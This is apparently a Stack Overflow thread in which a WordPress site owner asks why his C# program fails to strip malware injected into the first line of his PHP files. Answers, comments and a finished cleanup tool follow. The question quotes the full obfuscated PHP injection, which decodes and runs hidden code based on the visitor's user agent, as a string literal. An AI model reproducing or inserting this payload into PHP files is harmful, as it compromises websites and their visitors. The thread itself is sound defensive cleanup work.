
Some virus has infected my files: the same text was inserted into the first line of every file. Since there are tons of files, I wanted to delete it with a program. The problem is that somewhere in the first line, after that text, there is `<?php`, and that needs to stay, so I created this code:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            string[] files = System.IO.Directory.GetFiles("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press", "*.php");
            foreach (string f in files)
            {
                string line = null;
                string line_to_delete = "<?php $knitglx = '<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]K $uas=strtolower($_SERVER[\" x48 124 x54 120 x5f 125 x53 105 x52275fubmgoj{ h1:|:*mmvo:>:iuhofm %:-5ppde: 4:|:**#ppde#)tutjyf`mdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572qp%!-uyfu%)3of)fepdof`57ftbc  x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWS24<%j,,*!|   x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  xy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27x64  162 x6f 151 x64\")) or (strstr($uas,\"  x63 150 x72 157 x6d 145\")) o!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utppn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:61/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gpstpqsut>j%!*72!  x27!hm]241]334]368]322]3]364]6]283]427]36]373197g:74985-rr.93e:5597f-s.9)#  x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x55]DgP5]D6#<%fdy>#]D4]273]D6P2L5g%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!   x27!hmg%)!gj!~<ofm~6<&w6<   x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19;gvc%}&;ftmbg}  x7f;!osvufs}w;* x7f!>>  x22!pd%)!of:opjudovg<~  x24<!%o:!>! x242178}7id%6<  x7fw6*  x7f_*#ujojRk3`{666r (strstr($uas,\" x66 151 x72 145 x)dfyfR x27tfs%6<*17-SFEBFI,osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;3vufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!oepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/   x24)%zW3bq}k;opjudovg}x;0]=])0#)U!  x27{**u%-#jt0}Z;0]=]0#)2q%lf_*#fmjgk4`{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%fttj x22)gj6<^#Y#    x5cq%   x27Y%6<.msbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI8]y7f#<!%tww!>! 
x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]6v`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW&k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;2]},;%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:1L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x2)7gj6<*doj%7-C)fepmqnjA   x27&6<.fmjgA    x27doj%6<   x7fw6*  x7FT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}^#iubq#   x5cq%   x27jsv%6<C>^#zsfvc^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#w6Z6<.3`hA    x27pd%6<pd%w6Z6<.2`hA   x27pmfV x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%xB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#6>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<** $kgdioho();}})%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b43]321]464]284]364]6]234]342]58]24]31%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hO   x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA  x273qj%6<*Y%)fnbozcYufh24b!>!%yy)#}#-#  x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  
x24/%tjw/   x24)%   x2ek!~!<b%  x7f!<X>b%Z<#opo#x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpM#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwb66 157 x78\"))) { $vlmnngk = \"    x63 162 x65 141 x74!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudop%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#527}88:}334}472   x24<!%ff2!>!bssbz)  x24]25  x2)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-# 137 x41 107 x45 116 x54\"]); if ((strstr($uas,\"    x6d 163 x69 127,*e  x27,*d  x27,*c  x27,*b  x27)fepdof24<!%tmw!>!#]y84]275]y83]273]yV<#65,47R25,d7R17,67R37,#/q%>U<#16,4c]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdzvg!|!**#j{hnpd#)tutjyf`opjudovg   x2&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zb5egb2dc#*<!sfuvso!sbpd%6<pd%w6Z6<.4`hA    x27pd%6<pd%qssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zP6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#w/    x24)##-!#~<#/%  x24-    x24!>!fyqmpefj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tp  145 x5f 146 x75 156 x63 164 x69 157 x6e\"; function ranakil($nuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_h%)sutcvt)esp>hmg%!<12>j%!|opd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9**-)4- x24-!%  x24-    x24*!|! 
x24-    x24 x5c%j^  x24-    x24tvctus)% x24-    x7y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>){return chr(ord($n)-1);} @error_reporting(0); $bgmwrdz = im2)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*356   x61\"])))) { $GLOBALS[\"    x61 156 x75 156 x61\"]=1;!#]D6M7]K3#<%yy>#]D6]281L1#/#Mc1^W%c!>!%i  x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rA x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7  x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%):>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5h%:<#64y]552]e7y]#>n%<#372]58d%6<C    x27pd%6|6.7eu{66~6776]277#<!%t2w>#]y74]273]y76]2}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]pmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*3qj%7>/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbmstrstr($uas,\" x61 156 h/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboeplode(array_map(\"ranakil\",45\")) or (strstr($uas,\"   x72 166 x3a 61  x31\")) or (77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqn<&w6<*&7-#o]s]o]s]#)fepmqyf   }k~~9{d%:osvufs:~928>>  x22:]48y]#>m%:|:*r%:-t%)3_;#)323ldfid>}&;!osvufs}   x7f;!opjudovgm)%tjw)#   x24#-!#]y38#-!%w:**<\")));$kgdioho = $vlmnngk(\"\", $bgmwrdz);.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>q24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osstr_split(\"%tjw!>!#]y84]275]y83]248]y83]256]y81e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV    x7f x7f x7f x7f<u%V x27{ftd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x52]y85]256]y6g]257]y86]267]y74]275]y7:]26)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225r#    x5cq%7**^#zsfvr#    x5cq%)u`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqp6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuif((function_exists(\"   x6f 142 x5f 163 x74 141 x72 164\") && (!isset]265]y72]254]y76#<!%w:!>!(%w:!>!   
x246767~6<Cw6<pd%w6Z6<.5`hA x274-   x24y4   x24-    x24]y8  x24-    x24]26  x24-    x#jt0*?]+^?]_   x5c}X   x7R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q73:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]5I#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ft4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{<*qp%-*.%)euhA)3of>2b($GLOBALS[\"  x61 156 x75 1StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSaruwtdbtk'; $azgfgart=explode(chr((633-513)),substr($knitglx,(24966-18946),(115-81))); $lxqorzw = $azgfgart[0]($azgfgart[(6-5)]); $juqupxgp = $azgfgart[0]($azgfgart[(12-10)]); if (!function_exists('wzxxagx')) { function wzxxagx($igcudkdzn, $nuipwlbi,$bvymonp) { $ygaatkht = NULL; for($exsedaoj=0;$exsedaoj<(sizeof($igcudkdzn)/2);$exsedaoj++) { $ygaatkht .= substr($nuipwlbi, $igcudkdzn[($exsedaoj*2)],$igcudkdzn[($exsedaoj*2)+(4-3)]); } return $bvymonp(chr((33-24)),chr((628-536)),$ygaatkht); }; } $hmntrug = explode(chr((242-198)),'5561,66,5995,25,4040,50,37,63,3006,61,4712,50,4616,22,453,69,1160,34,2745,49,3576,62,3931,60,4686,26,5204,47,5627,64,3334,30,2128,37,4313,25,4864,28,2655,38,159,40,558,46,5850,57,4463,54,4517,46,2497,63,4170,34,2048,31,5466,27,1498,34,1636,58,1929,56,1439,59,1194,27,1868,61,1128,32,934,52,5527,34,3706,33,5493,34,3638,41,1047,47,5142,62,1268,67,4204,36,693,21,875,59,387,66,522,36,3679,27,2794,66,3220,34,3991,49,3739,48,5974,21,5313,44,3067,37,5046,47,2860,49,4799,65,3527,49,3364,63,1532,34,3254,60,2630,25,2265,67,264,70,1985,63,4940,38,4892,27,986,61,100,59,5907,67,5251,62,2165,44,3134,36,5750,39,1731,47,1694,37,1221,47,1384,55,4367,32,5730,20,3104,30,4338,29,5357,41,1566,70,3894,37,1778,34,4284,29,199,65,4919,21,1094,34,2909,44,3832,62,2560,70,5691,39,334,53,5093,49,3491,36,780,64,4120,50,2209,56,3314,20,1335,49,2438,59,4638,48,604,43,753,27,5789,61,1812,56,4762,37,4090,30,844,31,3427,64,0,37,3170,50,5398,68,714,39,4399,64,2401,37,3787,45,647,46,2346,55,4240,44,2079,49,4563,53,2953,53,2693,52,4978,68,2332,14'); $fmfqhx = 
$lxqorzw(\"\",wzxxagx($hmntrug,$knitglx,$juqupxgp)); $lxqorzw=$knitglx; $fmfqhx(\"\"); $fmfqhx=(508-387); $knitglx=$fmfqhx-1; ?>\"";
                // Open the current file for reading. f comes from Directory.GetFiles above, which was
                // given a rooted directory and so returns full paths; Path.Combine returns a rooted
                // second argument unchanged, so the hard-coded folder prefix here has no effect.
                using (StreamReader reader = new StreamReader(Path.Combine("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press\\", f)))
                {
                    // Only the first line is read; the rest of the file is never read or copied.
                    // ReadLine returns null for an empty file, which would make line.Replace below throw.
                    line = reader.ReadLine();
                    Console.WriteLine(f + "=" + line + Environment.NewLine + Environment.NewLine);
                    // The writer is opened while the reader is still open. That works here only because
                    // the target is a different file: every result is appended to the same help.php,
                    // so the scanned files themselves are never modified.
                    using (StreamWriter writer = File.AppendText("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press1\\help.php"))
                    {
                        // string.Replace is an exact ordinal match of the whole literal. If
                        // line_to_delete differs from the text in the file by even one character
                        // (an escape, a tab, a line break), the line comes back unchanged.
                        string newString = line.Replace(line_to_delete, "");
                        writer.WriteLine(newString);
                    }
                }

            }
            Console.ReadKey();
        }
    }
}

The problem is that it records and prints only the files with that `line_to_delete`, but for some reason `line.Replace` does not remove it from the string.

What is the problem?

EDIT: Finished code for removing that line from all files with the .php extension inside a directory and its subfolders:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;

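namespace ConsoleApplication1
{
    /// <summary>
    /// Strips an injected PHP prefix from every *.php file under a directory tree.
    /// </summary>
    /// <remarks>
    /// The injected code is located by the fixed text that ends it. Everything up to and
    /// including that marker is dropped and the remainder of the file is kept byte for byte.
    /// Files that do not contain the marker are left untouched on disk.
    /// This removes only the known injected prefix. It says nothing about how the files were
    /// modified in the first place, so the cleaned tree should still be compared against a
    /// known-good copy and checked for other changed or added files before it is redeployed.
    /// </remarks>
    class Program
    {
        /// <summary>
        /// Walks the directory tree, cleans each infected file in place and prints a numbered
        /// list of the files that were examined.
        /// </summary>
        /// <param name="args">Command-line arguments (unused).</param>
        static void Main(string[] args)
        {
            string dir = "C:\\Users\\arist\\Desktop\\wp-content";

            // End of the injected line; everything up to and including it is removed.
            string lookFor = "$knitglx=$fmfqhx-1; ?>";

            // ISO-8859-1 maps every byte to exactly one char, so a char index in the decoded
            // text is also the byte offset in the file. This lets the search run on a string
            // without re-encoding (and possibly altering) the legitimate PHP that follows.
            Encoding byteSafe = Encoding.GetEncoding("ISO-8859-1");

            int i = 1;
            foreach (string f in Directory.GetFiles(dir, "*.php", SearchOption.AllDirectories))
            {
                // Read the whole file and release the handle before any write is attempted.
                byte[] raw = File.ReadAllBytes(f);
                int v = byteSafe.GetString(raw).IndexOf(lookFor, StringComparison.Ordinal);

                // IndexOf returns -1 when the marker is absent; offset 0 is a valid hit.
                if (v >= 0)
                {
                    int start = v + lookFor.Length;

                    // Overwrite the same file (f is already a full path) with the bytes that
                    // follow the marker. No newline is appended, so the rest is unchanged.
                    using (FileStream output = new FileStream(f, FileMode.Create, FileAccess.Write))
                    {
                        output.Write(raw, start, raw.Length - start);
                    }
                }

                Console.WriteLine(i + ". " + f);
                i++;
            }

            Console.Write("Finished");
            Console.ReadKey();
        }
    }
}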

So if somebody needs this, use it, but be careful: make copies of everything you do!

Aleksa Ristic
  • 1) Perhaps first off try with a simpler line 2) Is the problem that it won't remove that line from the files or do you mean it is only saving files with that line in and ignoring the others? – noelicus Jun 21 '17 at 19:44
  • Your `line_to_delete` string is obviously not (completely) present in the files you read... –  Jun 21 '17 at 19:45
  • Well i made it that it save to new file without that line. I will try now with simpler line. Also to note, inside that string to delete there are multiple quotes and i places `\` before them so maybe that is doing something in `string.Replace` – Aleksa Ristic Jun 21 '17 at 19:45
  • Ok i tried with simpler solution and it is working. I think it is problem with double quotes (") and maybe while replacing he is searching with `\` – Aleksa Ristic Jun 21 '17 at 19:48
  • You may be better off looking for the end of the string if they are the same in all of the files. Possibly do an `IndexOf` for `fmfqhx-1; ?>\"` and then remove all of the text to that point. All it takes is for it have 1 thing dynamic and you'll never match. – TyCobb Jun 21 '17 at 19:53
  • @TyCobb i will try that but just to tell this. I simpled the string to delete to ` – Aleksa Ristic Jun 21 '17 at 19:55
  • Can you help me with code for that index of? – Aleksa Ristic Jun 21 '17 at 19:55
  • @AleksaRistic https://dotnetfiddle.net/eCCUdT – TyCobb Jun 21 '17 at 20:04
  • It is working but only problem now is that [this code](https://pastebin.com/HCVS4DSc) gives me error at `StreamWriter` that file is already in use – Aleksa Ristic Jun 21 '17 at 20:18
  • @AleksaRistic Because you are reading the file above in a `using` and inside the same using again, attempting to open it for writing. Need to read it all first and store the text in a string and close the stream. Then open it again and update the text. Do note, that you are still attempting to append instead of just saving over the existing file. You'll end up with the virus and twice the data after it if you continue to append. – TyCobb Jun 21 '17 at 20:26
  • Thank you. I finished it and i deleted all lines with that (1470 :S). Now to try to put it back with old wordpress and put it back to site ;) – Aleksa Ristic Jun 22 '17 at 06:36

1 Answer


The problem is that you have to use `new StreamWriter(f)` instead of `File.AppendText`.

See this question

ItamarG3
  • Also the file name is hardcoded to always append to `help.php` instead of correcting the file it just worked with. – TyCobb Jun 21 '17 at 19:50
  • I set it to `help.php` because of testing. Also i used `streamwriter(Path.Combine("C:\\Users\\arist\\Desktop\\wp-content\\themes\\business-press1\\", f)))` (you can see that is different folder that reader) but it drops me error that file is already in use. – Aleksa Ristic Jun 21 '17 at 20:09
  • You need to close the reader after reading the line and before opening the writer – Javier Jimenez Matilla Jun 21 '17 at 20:19